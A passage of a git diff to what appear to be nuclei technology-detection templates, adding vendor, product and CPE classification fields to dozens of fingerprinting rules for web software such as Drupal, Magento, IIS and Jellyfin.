cpe:2.3:a:payara:payara:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-plesk-page.yaml b/http/technologies/default-plesk-page.yaml index 34a74e256b..fea9338d75 100644 --- a/http/technologies/default-plesk-page.yaml +++ b/http/technologies/default-plesk-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Web Server's Default Page" + product: plesk + vendor: plesk tags: tech,plesk + classification: + cpe: cpe:2.3:a:plesk:plesk:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-redhat-test-page.yaml b/http/technologies/default-redhat-test-page.yaml index 518c8f746f..31132dadd3 100644 --- a/http/technologies/default-redhat-test-page.yaml +++ b/http/technologies/default-redhat-test-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Test Page for the Apache HTTP Server on Red Hat Enterprise Linux" + product: enterprise_linux_server + vendor: redhat tags: tech,redhat + classification: + cpe: cpe:2.3:o:redhat:enterprise_linux_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-sitecore-page.yaml b/http/technologies/default-sitecore-page.yaml index 4a3d8850ca..e3ac33528e 100644 --- a/http/technologies/default-sitecore-page.yaml +++ b/http/technologies/default-sitecore-page.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Welcome to Sitecore" + product: experience_platform + vendor: sitecore tags: tech,sitecore,cms + classification: + cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-ssltls-test-page.yaml b/http/technologies/default-ssltls-test-page.yaml index 610d1612ef..b58249d4ec 100644 --- a/http/technologies/default-ssltls-test-page.yaml +++ b/http/technologies/default-ssltls-test-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Test Page for the SSL/TLS-aware Apache Installation on Web Site" + product: http_server + vendor: apache tags: tech,ssltls + classification: + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-symfony-page.yaml b/http/technologies/default-symfony-page.yaml index cd123d676d..ea896920f9 100644 --- a/http/technologies/default-symfony-page.yaml +++ b/http/technologies/default-symfony-page.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Welcome to Symfony" + product: symfony + vendor: sensiolabs tags: tech,symfony,default-page + classification: + cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-tengine-page.yaml b/http/technologies/default-tengine-page.yaml index fc1012ee9c..80473654b3 100644 --- a/http/technologies/default-tengine-page.yaml +++ b/http/technologies/default-tengine-page.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Welcome to tengine" + product: tengine + vendor: alibaba tags: tech,tengine,default-page + classification: + cpe: cpe:2.3:a:alibaba:tengine:*:*:*:*:nginx:*:*:* http: - method: GET path: diff --git a/http/technologies/default-websphere-liberty.yaml b/http/technologies/default-websphere-liberty.yaml index 44a3acb8ec..ae95a2ad4a 100644 --- a/http/technologies/default-websphere-liberty.yaml +++ b/http/technologies/default-websphere-liberty.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"WebSphere Liberty" + product: websphere_liberty + vendor: ibm tags: tech,websphere,liberty + classification: + cpe: cpe:2.3:a:ibm:websphere_liberty:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml index bb75a25835..096bbe0aff 100644 --- a/http/technologies/devexpress-detect.yaml +++ b/http/technologies/devexpress-detect.yaml @@ -12,8 +12,12 @@ info: metadata: max-request: 1 shodan-query: html:"DXR.axd" + product: devexpress_components + vendor: devexpress tags: devexpress,iis,microsoft,asp,tech + classification: + cpe: cpe:2.3:a:devexpress:devexpress_components:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: part: body words: - "DXR.axd" -# digest: 4a0a00473045022100e6b541bb707f808e2619e24fee2f542be9a9cbd19eb02851ba751615a5021d88022068d3b18cffac63e834595feb95fef57ed70a2bcd4b9ff6f29df6d6878426b6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e6b541bb707f808e2619e24fee2f542be9a9cbd19eb02851ba751615a5021d88022068d3b18cffac63e834595feb95fef57ed70a2bcd4b9ff6f29df6d6878426b6a1:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/directus-detect.yaml b/http/technologies/directus-detect.yaml index beb38c3cd5..aae33ae88b 100644 --- a/http/technologies/directus-detect.yaml +++ b/http/technologies/directus-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 google-query: 'X-Powered-By: Directus' + product: directus + vendor: monospace tags: tech,directus,detect + classification: + cpe: cpe:2.3:a:monospace:directus:*:*:*:*:-:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: words: - "X-Powered-By: Directus" case-insensitive: true -# digest: 490a0046304402201c1b4978d386631e676b45fc6b59fb4c8ae13b345b464cdd1bfefe5840e2a3800220499da0d0b93930d1a5d080db752255740841748c0e6ea6a3799b81544e071e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c1b4978d386631e676b45fc6b59fb4c8ae13b345b464cdd1bfefe5840e2a3800220499da0d0b93930d1a5d080db752255740841748c0e6ea6a3799b81544e071e5d:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/drupal-detect.yaml b/http/technologies/drupal-detect.yaml index afa8c8af2f..f62c0840bc 100644 --- a/http/technologies/drupal-detect.yaml +++ b/http/technologies/drupal-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 3 shodan-query: http.component:"Drupal" + product: drupal + vendor: drupal tags: tech,drupal + classification: + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/elasticsearch-sql-client-detect.yaml b/http/technologies/elasticsearch-sql-client-detect.yaml index 1cd75fc9ba..f27ad1cb17 100644 --- a/http/technologies/elasticsearch-sql-client-detect.yaml +++ b/http/technologies/elasticsearch-sql-client-detect.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Elasticsearch-sql client" + product: elasticsearch + vendor: elastic tags: elasticsearch,tech,sql + classification: + cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/element-web-detect.yaml b/http/technologies/element-web-detect.yaml index ad7b412929..c4f7bce756 100644 --- a/http/technologies/element-web-detect.yaml +++ b/http/technologies/element-web-detect.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 2 shodan-query: html:"manifest.json" + product: element + vendor: matrix tags: tech,matrix,element,detect + classification: + cpe: cpe:2.3:a:matrix:element:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: part: body regex: - '[^\s]+' -# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/empirecms-detect.yaml b/http/technologies/empirecms-detect.yaml index bd2fea03e8..9c8a185704 100644 --- a/http/technologies/empirecms-detect.yaml +++ b/http/technologies/empirecms-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.html:EmpireCMS + product: empirecms + vendor: phome tags: tech,empirecms + classification: + cpe: cpe:2.3:a:phome:empirecms:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/gitbook-detect.yaml b/http/technologies/gitbook-detect.yaml index 83a4953277..de519ca79e 100644 --- a/http/technologies/gitbook-detect.yaml +++ b/http/technologies/gitbook-detect.yaml @@ -11,8 +11,12 @@ info: max-request: 1 shodan-query: http.title:"gitbook" fofa: app="Introduction-GitBook" + product: gitbook + vendor: gitbook tags: tech,gitbook + classification: + cpe: cpe:2.3:a:gitbook:gitbook:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/glpi-status-page.yaml b/http/technologies/glpi-status-page.yaml index 19d25dbbd3..610f1afa44 100644 --- a/http/technologies/glpi-status-page.yaml +++ b/http/technologies/glpi-status-page.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"glpi" + product: glpi + vendor: glpi-project tags: tech,status,glpi + classification: + cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/goliath-detect.yaml b/http/technologies/goliath-detect.yaml index d5de1bef60..39265f0951 100644 --- a/http/technologies/goliath-detect.yaml +++ b/http/technologies/goliath-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: 'Server: Goliath' + product: goliath + vendor: goliath_project tags: tech,goliath + classification: + cpe: cpe:2.3:a:goliath_project:goliath:*:*:*:*:ruby:*:*:* http: - method: GET path: diff --git a/http/technologies/google/chromecast-detect.yaml b/http/technologies/google/chromecast-detect.yaml index af7b1bcb74..429c6325ca 100644 --- a/http/technologies/google/chromecast-detect.yaml +++ b/http/technologies/google/chromecast-detect.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: Chromecast + product: chromecast + vendor: google tags: google,chromecast,detect + classification: + cpe: cpe:2.3:h:google:chromecast:*:*:*:*:*:*:*:* http: - raw: - | @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/graylog/graylog-api-exposure.yaml b/http/technologies/graylog/graylog-api-exposure.yaml index 62d08209c3..9359e52316 100644 --- a/http/technologies/graylog/graylog-api-exposure.yaml +++ b/http/technologies/graylog/graylog-api-exposure.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 50 shodan-query: Graylog + product: graylog + vendor: graylog tags: tech,graylog,api,swagger,fuzz + classification: + cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:* http: - method: GET path: @@ -88,4 +92,4 @@ http: - "status_code == 401" - "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')" condition: and -# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/hugo-detect.yaml b/http/technologies/hugo-detect.yaml index 1f16255e37..aa38c4b59f 100644 --- a/http/technologies/hugo-detect.yaml +++ b/http/technologies/hugo-detect.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.html:'Hugo' + product: hugo + vendor: gohugo tags: tech,hugo + classification: + cpe: cpe:2.3:a:gohugo:hugo:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/ibm/ibm-http-server.yaml b/http/technologies/ibm/ibm-http-server.yaml index 1ba9585398..0ac7c08c97 100644 --- a/http/technologies/ibm/ibm-http-server.yaml +++ b/http/technologies/ibm/ibm-http-server.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"IBM-HTTP-Server" + product: http_server + vendor: ibm tags: tech,ibm + classification: + cpe: cpe:2.3:a:ibm:http_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/ibm/ibm-odm-detect.yaml b/http/technologies/ibm/ibm-odm-detect.yaml index 66ba36ce29..e3ba3b6deb 100644 --- a/http/technologies/ibm/ibm-odm-detect.yaml +++ b/http/technologies/ibm/ibm-odm-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: "icon_hash=\"707491698\"" + product: operational_decision_manager + vendor: ibm tags: ibm,decision-center,tech,detect + classification: + cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009fde9a9d99b03b9b2eddba0e3707bab095af7d6ffb09a75f72f876af01223254022100ddba1fd9377de788acdf1e8e88c42137b393c5cd18bc4c8ca0154150a676940f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009fde9a9d99b03b9b2eddba0e3707bab095af7d6ffb09a75f72f876af01223254022100ddba1fd9377de788acdf1e8e88c42137b393c5cd18bc4c8ca0154150a676940f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/icecast-mediaserver-detect.yaml b/http/technologies/icecast-mediaserver-detect.yaml index ef56542e66..5fa580d138 100644 --- a/http/technologies/icecast-mediaserver-detect.yaml +++ b/http/technologies/icecast-mediaserver-detect.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:xiph:icecast:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Icecast Streaming Media Server" + product: icecast + vendor: xiph tags: tech,icecast,media-server,detect http: diff --git a/http/technologies/icecast-server-detect.yaml b/http/technologies/icecast-server-detect.yaml index e900cee021..6dfb743b07 100644 --- a/http/technologies/icecast-server-detect.yaml +++ b/http/technologies/icecast-server-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Icecast Streaming Media Server" + product: icecast + vendor: xiph tags: tech,icecast + classification: + cpe: cpe:2.3:a:xiph:icecast:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/identity-server-v3-detect.yaml b/http/technologies/identity-server-v3-detect.yaml index 1d54d2dc5f..3a196983fe 100644 --- a/http/technologies/identity-server-v3-detect.yaml +++ b/http/technologies/identity-server-v3-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"IdentityServer v3" + product: identity_server + vendor: wso2 tags: tech,identityserver,detect + classification: + cpe: cpe:2.3:a:wso2:identity_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +39,4 @@ http: group: 1 regex: - '(?i)build\s+([a-z0-9.-]+)' -# digest: 4b0a00483046022100cddb07ee93c5a5ea5aaa38543a5cb261019049ec97197bf96407ca82ee44ffb3022100b37750bf50540faa4c6cfbaf893d811a7fef9d22d81d4bf2f631a8faef8e7660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cddb07ee93c5a5ea5aaa38543a5cb261019049ec97197bf96407ca82ee44ffb3022100b37750bf50540faa4c6cfbaf893d811a7fef9d22d81d4bf2f631a8faef8e7660:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/imgproxy-detect.yaml b/http/technologies/imgproxy-detect.yaml index f9df84d1e9..b3ab6ec590 100644 --- a/http/technologies/imgproxy-detect.yaml +++ b/http/technologies/imgproxy-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"imgproxy" + product: imgproxy + vendor: evilmartians tags: imgproxy,tech,detect + classification: + cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - 'status_code == 200' - 'contains(server, "imgproxy")' condition: and -# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/influxdb-version-detect.yaml b/http/technologies/influxdb-version-detect.yaml index f31e5b6a5d..4e13b8f712 100644 --- a/http/technologies/influxdb-version-detect.yaml +++ b/http/technologies/influxdb-version-detect.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: "X-Influxdb-" + product: influxdb + vendor: influxdata tags: tech,influxdb,api http: diff --git a/http/technologies/interactsh-server.yaml b/http/technologies/interactsh-server.yaml index f165fb08dd..4e35480ef1 100644 --- a/http/technologies/interactsh-server.yaml +++ b/http/technologies/interactsh-server.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"Interactsh Server" + product: interactsh + vendor: projectdiscovery tags: tech,interactsh + classification: + cpe: cpe:2.3:a:projectdiscovery:interactsh:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/ispyconnect-detect.yaml b/http/technologies/ispyconnect-detect.yaml index 545d461663..af83519262 100644 --- a/http/technologies/ispyconnect-detect.yaml +++ b/http/technologies/ispyconnect-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"iSpy" + product: ispy + vendor: ispyconnect tags: tech,ispy + classification: + cpe: cpe:2.3:a:ispyconnect:ispy:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/jeecg-boot-detect.yaml b/http/technologies/jeecg-boot-detect.yaml index 36f41942a3..6d6f5bba6b 100644 --- a/http/technologies/jeecg-boot-detect.yaml +++ b/http/technologies/jeecg-boot-detect.yaml @@ -9,8 +9,12 @@ info: metadata: max-request: 2 fofa-query: title="Jeecg-Boot" + product: jeecg_boot + vendor: jeecg tags: jeecg-boot,tech + classification: + cpe: cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/jellyfin-detect.yaml b/http/technologies/jellyfin-detect.yaml index 98a4fb19f4..472f23f5f1 100644 --- a/http/technologies/jellyfin-detect.yaml +++ b/http/technologies/jellyfin-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 5 shodan-query: http.html:"Jellyfin" + product: jellyfin + vendor: jellyfin tags: tech,jellyfin + classification: + cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/jhipster-detect.yaml b/http/technologies/jhipster-detect.yaml index 4ec5762138..db13819701 100644 --- a/http/technologies/jhipster-detect.yaml +++ b/http/technologies/jhipster-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 2 shodan-query: http.html:"JHipster" + product: jhipster + vendor: jhipster tags: tech,jhipster + classification: + cpe: cpe:2.3:a:jhipster:jhipster:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/jitsi-meet-detect.yaml b/http/technologies/jitsi-meet-detect.yaml index dd1173c2c7..5517df9adb 100644 --- a/http/technologies/jitsi-meet-detect.yaml +++ b/http/technologies/jitsi-meet-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Jitsi Meet" + product: meet + vendor: jitsi tags: tech,jitsi + classification: + cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:docker:*:*:* http: - method: GET path: diff --git a/http/technologies/joomla-detect.yaml b/http/technologies/joomla-detect.yaml index afe3244726..54aaf6f94e 100644 --- a/http/technologies/joomla-detect.yaml +++ b/http/technologies/joomla-detect.yaml @@ -15,8 +15,12 @@ info: verified: true max-request: 5 google-query: Joomla! Administration Login inurl:"/index.php" || intitle:"Joomla Web Installer" + product: joomla\\! + vendor: joomla tags: tech,joomla,cms,oss + classification: + cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/kodexplorer-detect.yaml b/http/technologies/kodexplorer-detect.yaml index 2689d85062..d856052790 100644 --- a/http/technologies/kodexplorer-detect.yaml +++ b/http/technologies/kodexplorer-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 fofa-query: app="Powered-by-KodExplorer" + product: kodexplorer + vendor: kodcloud tags: kodexplorer,tech + classification: + cpe: cpe:2.3:a:kodcloud:kodexplorer:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/landesk/landesk-ma.yaml b/http/technologies/landesk/landesk-ma.yaml index 18f6f590c7..f290195513 100644 --- a/http/technologies/landesk/landesk-ma.yaml +++ b/http/technologies/landesk/landesk-ma.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"LANDESK(R)" + product: landesk_management_suite + vendor: landesk tags: tech,landesk + classification: + cpe: cpe:2.3:a:landesk:landesk_management_suite:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/limesurvey-detect.yaml b/http/technologies/limesurvey-detect.yaml index 3707ea8649..1ca5a1ada7 100644 --- a/http/technologies/limesurvey-detect.yaml +++ b/http/technologies/limesurvey-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:1781653957 + product: limesurvey + vendor: limesurvey tags: tech,limesurvey + classification: + cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/livehelperchat-detect.yaml b/http/technologies/livehelperchat-detect.yaml index d84e0f6ae5..309d2c64de 100644 --- a/http/technologies/livehelperchat-detect.yaml +++ b/http/technologies/livehelperchat-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 3 fofa-query: title="Live Helper Chat" + product: live_helper_chat + vendor: livehelperchat tags: livehelperchat,tech + classification: + cpe: cpe:2.3:a:livehelperchat:live_helper_chat:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/magento-detect.yaml b/http/technologies/magento-detect.yaml index 1c9f220087..16e2a0fa34 100644 --- a/http/technologies/magento-detect.yaml +++ b/http/technologies/magento-detect.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 2 shodan-query: http.component:"Magento" + product: magento + vendor: magento tags: magento,tech + classification: + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/magento-eol.yaml b/http/technologies/magento-eol.yaml index a29adb2f62..197f143a49 100644 --- a/http/technologies/magento-eol.yaml +++ b/http/technologies/magento-eol.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.component:"Magento" + product: magento + vendor: magento tags: magento,tech,cms http: diff --git a/http/technologies/magento-version-detect.yaml b/http/technologies/magento-version-detect.yaml index e94258b285..6f143a948f 100644 --- a/http/technologies/magento-version-detect.yaml +++ b/http/technologies/magento-version-detect.yaml @@ -12,10 +12,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 shodan-query: http.component:"Magento" + product: magento + vendor: magento tags: tech,magento,cms http: diff --git a/http/technologies/magmi-detect.yaml b/http/technologies/magmi-detect.yaml index 33c5df2af9..82cb864148 100644 --- a/http/technologies/magmi-detect.yaml +++ b/http/technologies/magmi-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.component:"Magento" + product: magmi + vendor: magmi_project tags: magento,magmi,plugin,tech + classification: + cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/matrix-homeserver-detect.yaml b/http/technologies/matrix-homeserver-detect.yaml index de3ffd0bb8..06a4821e03 100644 --- a/http/technologies/matrix-homeserver-detect.yaml +++ b/http/technologies/matrix-homeserver-detect.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: title:"Synapse is running" + product: synapse + vendor: matrix tags: tech,matrix,synapse + classification: + cpe: cpe:2.3:a:matrix:synapse:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: part: body json: - '.server | select((.name != null) and (.version != null)) | .name, .version' -# digest: 4a0a0047304502203e1ffa3c5daae7131064e90d6ef6c55e18e48adb8062b670833ad61902a3d87a022100f9a08b0c7c808f73b24041638cfcbca7eef9289d26402551967c25c1a3a41e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e1ffa3c5daae7131064e90d6ef6c55e18e48adb8062b670833ad61902a3d87a022100f9a08b0c7c808f73b24041638cfcbca7eef9289d26402551967c25c1a3a41e92:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/microsoft-iis-8.yaml b/http/technologies/microsoft-iis-8.yaml index c436f2e523..ac4bc4124a 100644 --- a/http/technologies/microsoft-iis-8.yaml +++ b/http/technologies/microsoft-iis-8.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Microsoft Internet Information Services 8" + product: iis + vendor: microsoft tags: tech,iis,microsoft + classification: + cpe: cpe:2.3:a:microsoft:iis:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/microsoft/default-iis7-page.yaml b/http/technologies/microsoft/default-iis7-page.yaml index c8abed447a..1ee69be51c 100644 --- a/http/technologies/microsoft/default-iis7-page.yaml +++ b/http/technologies/microsoft/default-iis7-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"IIS7" + product: iis + vendor: microsoft tags: tech,iis + classification: + cpe: cpe:2.3:a:microsoft:iis:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/microsoft/default-microsoft-azure-page.yaml b/http/technologies/microsoft/default-microsoft-azure-page.yaml index 185663a1f1..4a43422305 100644 --- a/http/technologies/microsoft/default-microsoft-azure-page.yaml +++ b/http/technologies/microsoft/default-microsoft-azure-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Microsoft Azure App Service - Welcome" + product: azure + vendor: microsoft tags: tech,azure,microsoft + classification: + cpe: cpe:2.3:a:microsoft:azure:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/microsoft/default-windows-server-page.yaml b/http/technologies/microsoft/default-windows-server-page.yaml index 507a7e23b1..494fc15f59 100644 --- a/http/technologies/microsoft/default-windows-server-page.yaml +++ b/http/technologies/microsoft/default-windows-server-page.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"IIS Windows Server" + product: windows_server_2003 + vendor: microsoft tags: tech,windows,iis + classification: + cpe: cpe:2.3:o:microsoft:windows_server_2003:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/mikrotik-httpproxy.yaml b/http/technologies/mikrotik-httpproxy.yaml index 356728cfb1..966a495d6d 100644 --- a/http/technologies/mikrotik-httpproxy.yaml +++ b/http/technologies/mikrotik-httpproxy.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: 'Server: mikrotik httpproxy' + product: rb3011uias-rm + vendor: mikrotik tags: tech,mikrotik + classification: + cpe: cpe:2.3:h:mikrotik:rb3011uias-rm:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/mongoose-server.yaml b/http/technologies/mongoose-server.yaml index 3c9c800083..a7e83405b7 100644 --- a/http/technologies/mongoose-server.yaml +++ b/http/technologies/mongoose-server.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: 'Server: Mongoose' + product: mongoose + vendor: cesanta tags: tech,mongoose + classification: + cpe: cpe:2.3:a:cesanta:mongoose:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/moveit-transfer-detect.yaml b/http/technologies/moveit-transfer-detect.yaml index 5fc9427f93..63774913af 100644 --- a/http/technologies/moveit-transfer-detect.yaml +++ b/http/technologies/moveit-transfer-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 2 shodan-query: html:"human.aspx" + product: moveit_transfer + vendor: progress tags: tech,moveit + classification: + cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/nacos-version.yaml b/http/technologies/nacos-version.yaml index 245d01ce4c..9c9491cc41 100644 --- a/http/technologies/nacos-version.yaml +++ b/http/technologies/nacos-version.yaml @@ -9,10 +9,13 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"Nacos" + product: nacos + vendor: alibaba tags: tech,detect,nacos http: @@ -43,4 